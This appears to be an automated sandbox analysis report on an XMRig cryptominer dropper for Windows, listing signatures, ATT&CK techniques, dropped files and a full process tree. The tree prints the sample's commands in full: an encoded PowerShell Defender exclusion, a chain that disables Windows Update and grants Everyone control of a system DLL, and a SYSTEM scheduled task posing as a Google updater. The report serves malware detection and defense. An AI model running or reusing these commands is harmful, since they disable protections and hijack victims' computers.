Analysis

  • max time kernel
    300s
  • max time network
    286s
  • platform
    windows7_x64
  • resource
    win7-20220718-en
  • resource tags

    arch:x64arch:x86image:win7-20220718-enlocale:en-usos:windows7-x64system
  • submitted
    02-08-2022 22:19

General

  • Target

    b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe

  • Size

    7.2MB

  • MD5

    39a2104f5c1096d1c9481cbf5203a820

  • SHA1

    17b15f09ef79c1cfc0b8ae2c52fd0e564b00aa34

  • SHA256

    b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc

  • SHA512

    7b22e01e8b271c17e9c1480802bf111c502b3b18894b9e6dbf42e011809cb1f8f965e454f78c7bd14561733c7ab2b831a08a962ba375fc19048184350d18bf52

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner payload 13 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 1 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Themida packer 9 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe
    "C:\Users\Admin\AppData\Local\Temp\b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of WriteProcessMemory
    PID:1388
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc.exe"
      2⤵
      • Drops file in Drivers directory
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1584
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAbAB4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAGkAeQBuACMAPgA="
        3⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1740
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1772
        • C:\Windows\system32\sc.exe
          sc stop UsoSvc
          4⤵
          • Launches sc.exe
          PID:600
        • C:\Windows\system32\sc.exe
          sc stop WaaSMedicSvc
          4⤵
          • Launches sc.exe
          PID:532
        • C:\Windows\system32\sc.exe
          sc stop wuauserv
          4⤵
          • Launches sc.exe
          PID:628
        • C:\Windows\system32\sc.exe
          sc stop bits
          4⤵
          • Launches sc.exe
          PID:1952
        • C:\Windows\system32\sc.exe
          sc stop dosvc
          4⤵
          • Launches sc.exe
          PID:1056
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
          4⤵
          • Modifies registry key
          PID:1640
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
          4⤵
          • Modifies registry key
          PID:1148
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
          4⤵
          • Modifies security service
          • Modifies registry key
          PID:1032
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
          4⤵
          • Modifies registry key
          PID:1528
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
          4⤵
          • Modifies registry key
          PID:1864
        • C:\Windows\system32\takeown.exe
          takeown /f C:\Windows\System32\WaaSMedicSvc.dll
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:1160
        • C:\Windows\system32\icacls.exe
          icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1196
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
          4⤵
          • Modifies registry key
          PID:1168
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
          4⤵
          • Modifies registry key
          PID:952
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
          4⤵
          • Modifies registry key
          PID:800
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
          4⤵
          • Modifies registry key
          PID:2000
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
          4⤵
            PID:960
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
            4⤵
              PID:1312
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
              4⤵
                PID:1768
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                4⤵
                  PID:600
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                  4⤵
                    PID:1672
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                    4⤵
                      PID:1544
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                      4⤵
                        PID:1532
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1756
                      • C:\Windows\system32\powercfg.exe
                        powercfg /x -hibernate-timeout-ac 0
                        4⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2016
                      • C:\Windows\system32\powercfg.exe
                        powercfg /x -hibernate-timeout-dc 0
                        4⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1872
                      • C:\Windows\system32\powercfg.exe
                        powercfg /x -standby-timeout-ac 0
                        4⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1852
                      • C:\Windows\system32\powercfg.exe
                        powercfg /x -standby-timeout-dc 0
                        4⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1472
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
                      3⤵
                        PID:1792
                        • C:\Windows\system32\schtasks.exe
                          schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
                          4⤵
                          • Creates scheduled task(s)
                          PID:1536
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                        3⤵
                          PID:1712
                          • C:\Windows\system32\schtasks.exe
                            schtasks /run /tn "GoogleUpdateTaskMachineQC"
                            4⤵
                              PID:1832
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {E44AC122-5CD3-4B4A-A620-C9ADE345B939} S-1-5-18:NT AUTHORITY\System:Service:
                        1⤵
                        • Loads dropped DLL
                        PID:540
                        • C:\Program Files\Google\Chrome\updater.exe
                          "C:\Program Files\Google\Chrome\updater.exe"
                          2⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Executes dropped EXE
                          • Checks BIOS information in registry
                          • Checks whether UAC is enabled
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          PID:1624
                          • C:\Windows\System32\conhost.exe
                            "C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"
                            3⤵
                            • Drops file in Drivers directory
                            • Suspicious use of SetThreadContext
                            • Drops file in Program Files directory
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1744
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAbAB4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAGkAeQBuACMAPgA="
                              4⤵
                              • Drops file in System32 directory
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1752
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                              4⤵
                                PID:1516
                                • C:\Windows\system32\sc.exe
                                  sc stop UsoSvc
                                  5⤵
                                  • Launches sc.exe
                                  PID:1584
                                • C:\Windows\system32\sc.exe
                                  sc stop WaaSMedicSvc
                                  5⤵
                                  • Launches sc.exe
                                  PID:1648
                                • C:\Windows\system32\sc.exe
                                  sc stop wuauserv
                                  5⤵
                                  • Launches sc.exe
                                  PID:1836
                                • C:\Windows\system32\sc.exe
                                  sc stop bits
                                  5⤵
                                  • Launches sc.exe
                                  PID:1632
                                • C:\Windows\system32\sc.exe
                                  sc stop dosvc
                                  5⤵
                                  • Launches sc.exe
                                  PID:1044
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                  5⤵
                                  • Modifies registry key
                                  PID:800
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                  5⤵
                                  • Modifies registry key
                                  PID:2000
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                  5⤵
                                  • Modifies registry key
                                  PID:1048
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                  5⤵
                                  • Modifies registry key
                                  PID:1312
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                  5⤵
                                  • Modifies registry key
                                  PID:1796
                                • C:\Windows\system32\takeown.exe
                                  takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                  5⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:532
                                • C:\Windows\system32\icacls.exe
                                  icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                  5⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  PID:1100
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                  5⤵
                                  • Modifies registry key
                                  PID:1936
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                  5⤵
                                  • Modifies registry key
                                  PID:2016
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                  5⤵
                                  • Modifies registry key
                                  PID:1544
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                  5⤵
                                  • Modifies registry key
                                  PID:1056
                                • C:\Windows\system32\schtasks.exe
                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                  5⤵
                                    PID:1668
                                  • C:\Windows\system32\schtasks.exe
                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                    5⤵
                                      PID:832
                                    • C:\Windows\system32\schtasks.exe
                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                      5⤵
                                        PID:824
                                      • C:\Windows\system32\schtasks.exe
                                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                        5⤵
                                          PID:772
                                        • C:\Windows\system32\schtasks.exe
                                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                          5⤵
                                            PID:564
                                          • C:\Windows\system32\schtasks.exe
                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                            5⤵
                                              PID:972
                                            • C:\Windows\system32\schtasks.exe
                                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                              5⤵
                                                PID:1528
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                              4⤵
                                                PID:1360
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -hibernate-timeout-ac 0
                                                  5⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:988
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -hibernate-timeout-dc 0
                                                  5⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1064
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -standby-timeout-ac 0
                                                  5⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1588
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -standby-timeout-dc 0
                                                  5⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:660
                                              • C:\Windows\System32\conhost.exe
                                                C:\Windows\System32\conhost.exe "ksvudlgzwxvyjy"
                                                4⤵
                                                  PID:1072
                                                • C:\Windows\explorer.exe
                                                  C:\Windows\explorer.exe ludkbupigbltzfui1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8Ux1mQQil7sp+RmWIA87i6XioWLBkWXEpGDqawTe1Tn4
                                                  4⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1580

                                          Network

                                          MITRE ATT&CK Matrix ATT&CK v6

                                          Execution

                                          Scheduled Task

                                          1
                                          T1053

                                          Persistence

                                          Modify Existing Service

                                          2
                                          T1031

                                          Scheduled Task

                                          1
                                          T1053

                                          Privilege Escalation

                                          Scheduled Task

                                          1
                                          T1053

                                          Defense Evasion

                                          Modify Registry

                                          2
                                          T1112

                                          Virtualization/Sandbox Evasion

                                          1
                                          T1497

                                          Impair Defenses

                                          1
                                          T1562

                                          File Permissions Modification

                                          1
                                          T1222

                                          Discovery

                                          Query Registry

                                          2
                                          T1012

                                          Virtualization/Sandbox Evasion

                                          1
                                          T1497

                                          System Information Discovery

                                          2
                                          T1082

                                          Impact

                                          Service Stop

                                          1
                                          T1489

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\Program Files\Google\Chrome\updater.exe
                                            Filesize

                                            7.2MB

                                            MD5

                                            39a2104f5c1096d1c9481cbf5203a820

                                            SHA1

                                            17b15f09ef79c1cfc0b8ae2c52fd0e564b00aa34

                                            SHA256

                                            b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc

                                            SHA512

                                            7b22e01e8b271c17e9c1480802bf111c502b3b18894b9e6dbf42e011809cb1f8f965e454f78c7bd14561733c7ab2b831a08a962ba375fc19048184350d18bf52

                                          • C:\Program Files\Google\Chrome\updater.exe
                                            Filesize

                                            7.2MB

                                            MD5

                                            39a2104f5c1096d1c9481cbf5203a820

                                            SHA1

                                            17b15f09ef79c1cfc0b8ae2c52fd0e564b00aa34

                                            SHA256

                                            b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc

                                            SHA512

                                            7b22e01e8b271c17e9c1480802bf111c502b3b18894b9e6dbf42e011809cb1f8f965e454f78c7bd14561733c7ab2b831a08a962ba375fc19048184350d18bf52

                                          • C:\Windows\system32\drivers\etc\hosts
                                            Filesize

                                            2KB

                                            MD5

                                            c5227366b7a688ff23b01788718251aa

                                            SHA1

                                            9795262e79c832ba49c744fcd1b1794c0ffb5c6a

                                            SHA256

                                            789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48

                                            SHA512

                                            8b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe

                                          • \Program Files\Google\Chrome\updater.exe
                                            Filesize

                                            7.2MB

                                            MD5

                                            39a2104f5c1096d1c9481cbf5203a820

                                            SHA1

                                            17b15f09ef79c1cfc0b8ae2c52fd0e564b00aa34

                                            SHA256

                                            b4ad8420ca6e25de9e98431b722f71e629570d91b85605f98a514a50736adbbc

                                            SHA512

                                            7b22e01e8b271c17e9c1480802bf111c502b3b18894b9e6dbf42e011809cb1f8f965e454f78c7bd14561733c7ab2b831a08a962ba375fc19048184350d18bf52

                                          • memory/532-135-0x0000000000000000-mapping.dmp
                                          • memory/532-72-0x0000000000000000-mapping.dmp
                                          • memory/540-170-0x0000000001120000-0x0000000001DD6000-memory.dmp
                                            Filesize

                                            12.7MB

                                          • memory/540-103-0x0000000001120000-0x0000000001DD6000-memory.dmp
                                            Filesize

                                            12.7MB

                                          • memory/564-146-0x0000000000000000-mapping.dmp
                                          • memory/600-98-0x0000000000000000-mapping.dmp
                                          • memory/600-71-0x0000000000000000-mapping.dmp
                                          • memory/628-74-0x0000000000000000-mapping.dmp
                                          • memory/660-132-0x0000000000000000-mapping.dmp
                                          • memory/772-144-0x0000000000000000-mapping.dmp
                                          • memory/800-93-0x0000000000000000-mapping.dmp
                                          • memory/800-129-0x0000000000000000-mapping.dmp
                                          • memory/824-143-0x0000000000000000-mapping.dmp
                                          • memory/832-142-0x0000000000000000-mapping.dmp
                                          • memory/952-92-0x0000000000000000-mapping.dmp
                                          • memory/960-95-0x0000000000000000-mapping.dmp
                                          • memory/972-147-0x0000000000000000-mapping.dmp
                                          • memory/988-123-0x0000000000000000-mapping.dmp
                                          • memory/1032-82-0x0000000000000000-mapping.dmp
                                          • memory/1044-127-0x0000000000000000-mapping.dmp
                                          • memory/1048-131-0x0000000000000000-mapping.dmp
                                          • memory/1056-77-0x0000000000000000-mapping.dmp
                                          • memory/1056-140-0x0000000000000000-mapping.dmp
                                          • memory/1064-126-0x0000000000000000-mapping.dmp
                                          • memory/1072-149-0x0000000000060000-0x0000000000067000-memory.dmp
                                            Filesize

                                            28KB

                                          • memory/1072-152-0x0000000000820000-0x0000000000826000-memory.dmp
                                            Filesize

                                            24KB

                                          • memory/1072-151-0x0000000000060000-0x0000000000067000-memory.dmp
                                            Filesize

                                            28KB

                                          • memory/1100-136-0x0000000000000000-mapping.dmp
                                          • memory/1148-80-0x0000000000000000-mapping.dmp
                                          • memory/1160-85-0x0000000000000000-mapping.dmp
                                          • memory/1168-91-0x0000000000000000-mapping.dmp
                                          • memory/1196-86-0x0000000000000000-mapping.dmp
                                          • memory/1312-133-0x0000000000000000-mapping.dmp
                                          • memory/1312-96-0x0000000000000000-mapping.dmp
                                          • memory/1360-120-0x0000000000000000-mapping.dmp
                                          • memory/1388-54-0x0000000000400000-0x00000000010B6000-memory.dmp
                                            Filesize

                                            12.7MB

                                          • memory/1388-58-0x0000000076CC0000-0x0000000076E69000-memory.dmp
                                            Filesize

                                            1.7MB

                                          • memory/1388-57-0x0000000000400000-0x00000000010B6000-memory.dmp
                                            Filesize

                                            12.7MB

                                          • memory/1388-56-0x0000000076CC0000-0x0000000076E69000-memory.dmp
                                            Filesize

                                            1.7MB

                                          • memory/1388-55-0x0000000000400000-0x00000000010B6000-memory.dmp
                                            Filesize

                                            12.7MB

                                          • memory/1472-81-0x0000000000000000-mapping.dmp
                                          • memory/1516-119-0x0000000000000000-mapping.dmp
                                          • memory/1528-83-0x0000000000000000-mapping.dmp
                                          • memory/1532-107-0x0000000000000000-mapping.dmp
                                          • memory/1536-89-0x0000000000000000-mapping.dmp
                                          • memory/1544-139-0x0000000000000000-mapping.dmp
                                          • memory/1544-104-0x0000000000000000-mapping.dmp
                                          • memory/1580-172-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1580-174-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1580-169-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1580-165-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1580-171-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1580-157-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1580-155-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1580-154-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1580-161-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1580-164-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1580-159-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1580-176-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1580-179-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1580-167-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1580-163-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

